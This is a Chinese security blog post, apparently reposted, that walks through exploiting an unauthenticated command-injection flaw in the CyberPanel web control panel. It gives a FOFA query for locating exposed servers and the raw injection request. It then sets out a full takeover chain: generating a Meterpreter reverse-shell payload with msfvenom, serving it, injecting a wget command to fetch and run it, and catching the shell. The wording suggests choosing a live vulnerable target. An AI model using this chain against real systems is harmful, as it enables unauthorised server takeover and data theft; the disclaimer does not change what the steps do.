深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

admin 2024年10月29日22:11:20评论100 views字数 1226阅读4分5秒阅读模式

深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

产品简介

深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

CyberPanel是一个开源的Web控制面板,它提供了一个用户友好的界面,用于管理网站、电子邮件9、数据库、FTP账户等。

CyberPanel旨在简化网站管理任务,使非技术用户也能轻松管理自己的在线资源。

深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

漏洞概述

深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

该漏洞源于upgrademysqlstatus接口未做身份验证Q 和参数过滤,未授权的攻击者可以通过此接口执行任意命令获取服务器权限,从而造成数据泄露、服务器被接管等严重的后果。目前该漏洞技术细节与EXP已在互联网上公开,鉴于该漏洞影响范围较大,建议用户尽快做好自查及防护。

深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

FOFA

深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

app="CyberPanel"

深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

漏洞复现

深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

OPTIONS /dataBases/upgrademysqlstatus HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Content-Type: application/jsonConnection: close{"statusfile":"/dev/null; id; #"}

深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

如果没有真实的环境和深入的手法,我估计你们也很难理解,来吧,小龙带你们整

深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

实战复现

深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

1、首先利用漏洞检测脚本进行检测

深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

2、然后去到kali上面利用msfvenom生成马子

msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=171.42.31.45 lport=4001 -f elf > test666

3、生成之后msf设置监听

use exploit/multi/handlerset payload linux/x64/meterpreter/reverse_tcpset lhost 192.168.1.100set lport 4001run

深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

4、然后利用Python -m http.server把刚刚生成的马子放到网页上

接下来我们在bp中挑选一位存在漏洞的幸运儿

深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

5、用这一段把原来检测用的命令给替换掉

wget -O ./test666 http://IP:8000/test666

点击发送

然后再写上

./test666

深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

6、这会儿就能看到msf成功上线了

深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

免责声明

深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

文章所涉及内容,仅供安全研究与教学之用,由于传播、利用本文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。

我们红岸基地网安教学,只有两个老师、一个是赵小龙老师、一个是陈师傅。可以联系微信:Changethe_one,只要你提供目前的现状与学历,陈老师可以免费帮大家做职业规划。

Changethe_one

大家对于网络安全感兴趣的话,不妨来加一下我们的陈老师,我们会定期在给大家分享渗透工具实战,还会有渗透公开课可以试听!

扫码添加,提升自己!

👇👇👇

深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

原文始发于微信公众号(暗影网安实验室):深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月29日22:11:20
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   深度复现Cyber​​Panel远程命令执行漏洞【QVD-2024-44346】见实战https://cn-sec.com/archives/3330000.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息